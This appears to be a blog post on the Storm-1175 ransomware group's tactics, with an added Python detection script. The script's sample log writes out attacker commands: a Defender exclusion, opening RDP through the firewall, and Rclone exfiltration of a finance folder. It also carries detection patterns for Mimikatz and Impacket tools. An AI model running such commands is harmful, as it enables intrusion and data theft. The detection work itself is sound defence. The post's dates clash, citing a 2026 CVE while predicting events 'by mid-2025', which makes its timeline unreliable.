What if the next ransomware note on your network arrived before lunch?
Storm-1175 — yeah, that China-linked crew Microsoft’s been tracking — isn’t messing around. They’ve turned zero-days into a blitzkrieg, slamming holes in everything from Ivanti to JetBrains, then dumping Medusa ransomware before you finish your coffee. It’s not hype; it’s happening now, hitting healthcare in the US, schools in the UK, banks Down Under.
Look, I’ve covered this beat for two decades. Back in the early 2000s, we’d see nation-states probe quietly; now these financially motivated operators — with Beijing fingerprints — move at warp speed. Who profits? Not victims. Follow the money: ransomware payouts, data sales on the dark web. But here’s my unique take — this feels like the Conti playbook reborn, post-2022 disbandment, but turbocharged with state-level zero-day access. Conti rotated vulns too, but Storm-1175’s doing it pre-disclosure. Coincidence?
Why Does Storm-1175 Hit Zero-Days Before We Even Know?
They don’t wait for headlines.
Microsoft lays it out cold: “The threat actor’s high operational tempo and proficiency in identifying exposed perimeter assets have proven successful, with recent intrusions heavily impacting healthcare organizations, as well as those in the education, professional services, and finance sectors in Australia, the United Kingdom, and the United States.”
“Storm-1175 rotates exploits quickly during the time between disclosure and patch availability or adoption, taking advantage of the period where many organizations remain unprotected,” Microsoft said.
That’s the quote that chills. CVE-2025-10035 in Fortra GoAnywhere? Zero-day. CVE-2026-23760 in SmarterMail? Same. They’ve chained 16+ vulns since 2023 — PaperCut, ConnectWise, even CrushFTP. Linux lovers, watch Oracle WebLogic; they’re probing there too, through a vulnerability that hasn’t even been identified yet.
And speed? Foothold to ransomware in 24 hours. Persistence via new users, web shells, legit RMM like ScreenConnect. Credential dumps with Mimikatz. Firewall tweaks for RDP. Defender exclusions. It’s a greatest-hits of LOLBins: PowerShell, PsExec, Impacket.
But PDQ Deployer for lateral moves? That’s slick — blending ransomware delivery into admin tools. Rclone exfils data; Bandizip packs it. No wonder detection sucks.
Is Your RMM Tool the Next Backdoor?
Here’s the thing — RMMs like AnyDesk, Atera, SimpleHelp? Dual-use gold for bad guys.
They tunnel malicious traffic through trusted encryption. Blends right in. I’ve seen this before: SolarWinds was supply-chain; this is tool-chain. Companies push ‘remote management’ without thinking adversaries love it too. Prediction: Expect regs on RMM logging by 2026, or lawsuits will force it. Who’s making bank? Vendors selling ‘secure’ versions post-breach.
Storm-1175’s flair for variety keeps defenders guessing. OWASP RF? Chained for post-compromise activity. Healthcare? Finance? Easy perimeters, fat ransoms.
Cynical me asks: Why Australia, the UK and the US? English speakers pay quick? Or is it a test run for bigger fish?
Patch gaps kill. They exploit N-days too — known but unpatched. Ivanti CVE-2023-46805? Still biting.
Who’s Actually Paying — And Why Should You Care?
Victims span sectors, but healthcare bleeds most — patient data gold.
Education? Budgets tight, patches lag. Finance? Rep damage huge. One org: Linux WebLogic pwned, unknown vuln. Cross-platform now.
My insight: This mirrors 2017 WannaCry — zero-days (EternalBlue), rapid spread, but targeted. Storm-1175’s not worming; they’re surgical. Bold call: By mid-2025, Medusa variants hit critical infra unless vendors embed auto-patches.
Defenses? Hunt RMM anomalies. Block PDQ if unused. MFA everywhere. But really — segment networks, air-gap the crown jewels.
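What “hunt RMM anomalies” looks like in practice, as an added example that is not from the article or from Microsoft: a small Python detection sketch that reads endpoint process and account events and scores each host on how many of the post-exploitation behaviours described above (web shell child processes, new local accounts, Defender exclusions, RDP firewall openings, credential dumping, RMM tools, PDQ/PsExec/Impacket lateral movement, Rclone/Bandizip staging) show up together. The log format, field names, sample records, executable names and rule weights are all constructed or assumed for the illustration; the only real identifiers are Windows Security event 4720 (user account created) and the tool names the article itself lists.

```python
"""Host-scoring detection sketch for the Storm-1175 tradecraft the article lists.

Added example, not the article's or Microsoft's code. The key=value record
format, sample events, executable names and weights are constructed/assumed.
RMM software is dual-use, so it scores low on its own; an alert needs several
distinct tactics on the same host.
"""
import re
from collections import defaultdict

# Constructed sample telemetry (not real). event=1 is process creation with
# parent/image/cmdline; event=4720 is the Windows "user account created" ID.
SAMPLE_LOG = """\
ts=2025-01-07T09:02:11Z host=web01 event=1 parent=w3wp.exe image=cmd.exe cmdline="cmd.exe /c whoami"
ts=2025-01-07T09:05:40Z host=web01 event=4720 user=svc_backup2 cmdline=""
ts=2025-01-07T09:06:02Z host=web01 event=1 parent=powershell.exe image=powershell.exe cmdline="powershell -c Add-MpPreference -ExclusionPath C:\\ProgramData\\tmp"
ts=2025-01-07T09:08:15Z host=web01 event=1 parent=cmd.exe image=netsh.exe cmdline="netsh advfirewall firewall add rule name=rdp dir=in action=allow protocol=TCP localport=3389"
ts=2025-01-07T09:15:33Z host=web01 event=1 parent=svchost.exe image=ScreenConnect.ClientService.exe cmdline="ScreenConnect.ClientService.exe"
ts=2025-01-07T10:41:09Z host=fs02 event=1 parent=services.exe image=PDQDeployRunner-1.exe cmdline="PDQDeployRunner-1.exe"
ts=2025-01-07T10:45:00Z host=fs02 event=1 parent=cmd.exe image=rclone.exe cmdline="rclone copy D:\\Finance remote:bucket"
ts=2025-01-07T11:00:12Z host=hr03 event=1 parent=explorer.exe image=AnyDesk.exe cmdline="AnyDesk.exe"
ts=2025-01-07T11:30:00Z host=hr03 event=1 parent=explorer.exe image=winword.exe cmdline="winword.exe report.docx"
"""

# key=value pairs; values with spaces are double-quoted.
KV_RE = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')

# RMM product names the article calls out; matched as substrings of the image
# name, so treat this as a coarse signal (assumed filenames).
RMM_NAMES = ("screenconnect", "anydesk", "atera", "simplehelp")


def parse_record(line):
    """Turn one key=value line into a dict (quoted values keep their spaces)."""
    return {key: (quoted or bare) for key, quoted, bare in KV_RE.findall(line)}


def _low(rec, key):
    return rec.get(key, "").lower()


# (tactic name, weight, predicate). Weights are assumed, chosen so that a single
# RMM install never alerts while exclusion tampering or credential theft nearly does.
RULES = [
    ("webshell_child", 4, lambda r: r.get("event") == "1"
        and _low(r, "parent") == "w3wp.exe"
        and _low(r, "image") in {"cmd.exe", "powershell.exe"}),
    ("new_local_account", 2, lambda r: r.get("event") == "4720"),
    ("defender_exclusion", 4, lambda r: "add-mppreference" in _low(r, "cmdline")
        and "-exclusion" in _low(r, "cmdline")),
    ("rdp_firewall_open", 3, lambda r: "advfirewall" in _low(r, "cmdline")
        and "3389" in _low(r, "cmdline") and "action=allow" in _low(r, "cmdline")),
    ("credential_dump", 5, lambda r: "mimikatz" in _low(r, "image")
        or "sekurlsa" in _low(r, "cmdline")),
    ("rmm_tool", 1, lambda r: any(n in _low(r, "image") for n in RMM_NAMES)),
    ("lateral_deploy", 3, lambda r: any(n in _low(r, "image") for n in ("pdqdeploy", "psexec"))
        or any(n in _low(r, "cmdline") for n in ("wmiexec", "smbexec"))),
    ("exfil_staging", 3, lambda r: any(n in _low(r, "image") for n in ("rclone", "bandizip"))),
]


def evaluate(log_text, threshold=6):
    """Score each host by the sum of weights of DISTINCT tactics seen on it."""
    first_seen = defaultdict(dict)  # host -> tactic -> first timestamp
    for line in log_text.splitlines():
        if not line.strip():
            continue
        rec = parse_record(line)
        host = rec.get("host", "unknown")
        for tactic, _weight, predicate in RULES:
            if predicate(rec):
                first_seen[host].setdefault(tactic, rec.get("ts"))
    weights = {tactic: weight for tactic, weight, _ in RULES}
    report = {}
    for host, tactics in first_seen.items():
        score = sum(weights[t] for t in tactics)
        report[host] = {"score": score, "tactics": sorted(tactics), "alert": score >= threshold}
    return report


if __name__ == "__main__":
    for host, result in sorted(evaluate(SAMPLE_LOG).items()):
        flag = "ALERT" if result["alert"] else "ok   "
        print(f"{flag} {host} score={result['score']} tactics={result['tactics']}")
```

On the constructed sample, web01 alerts on five stacked tactics (web shell child, new account, Defender exclusion, RDP rule, ScreenConnect), fs02 alerts on PDQ-style deployment plus Rclone, and hr03 with only AnyDesk stays quiet; that last case is the point of weighting RMM low, since the tool itself is legitimate and only the surrounding behaviour makes it suspicious.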
Microsoft’s right: Tempo wins. They’ve got zero-days fresh; we chase patches.
And the PR spin? Vendors blame users. ‘Patch faster!’ Sure. But disclose zero-days quicker, or fund bug bounties better.
Frequently Asked Questions
What is Storm-1175?
China-linked threat actor deploying Medusa ransomware via zero-day chains in Ivanti, JetBrains, and more. High-speed attacks, 24-hour ransomware drops.
Does Storm-1175 target Linux systems?
Yes, recently hitting Oracle WebLogic on Linux with unknown vulns, plus Windows everywhere else.
How do you stop Medusa ransomware from Storm-1175?
Patch all listed CVEs now, monitor RMM tools, block LOLBins, enforce MFA — and segment your network.